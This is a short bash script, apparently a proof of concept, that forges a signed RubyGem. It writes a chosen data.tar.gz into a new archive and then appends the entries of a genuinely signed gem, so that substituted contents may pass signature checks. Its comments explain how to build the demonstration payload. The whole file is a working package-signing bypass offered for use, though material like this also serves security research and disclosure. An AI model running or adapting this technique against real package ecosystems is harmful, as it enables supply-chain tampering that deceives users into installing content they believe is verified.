#!/bin/bash

set -e

# usage: ./forge-gem.sh signed.gem data.tar.gz forged.gem
# signed.gem and data.tar.gz must exist. forged.gem will be created.
# Make data.tar.gz like this:
# echo "hacked" > HACKED
# tar -czf data.tar.gz --format ustar --owner wheel:0 --group wheel:0 --mode 0444 -- HACKED

SIGNED_GEM_FILENAME=${1:?need signed gem filename as argument \$1}
DATA_TAR_GZ_FILENAME=${2:?need data.tar.gz filename as argument \$2}
FORGED_GEM_FILENAME=${3:?need forged gem filename as argument \$3}

# Set options to match the tar format gem produces, though it doesn't really matter.
TAR_OPTIONS="--format ustar --owner wheel:0 --group wheel:0 --mode 0444"

# Write the custom data.tar.gz first.
tar -cf "$FORGED_GEM_FILENAME" --transform 's/.*/data.tar.gz/' $TAR_OPTIONS -- "$DATA_TAR_GZ_FILENAME"
# Append the files of the existing signed archive.
tar -Af "$FORGED_GEM_FILENAME" -- "$SIGNED_GEM_FILENAME"
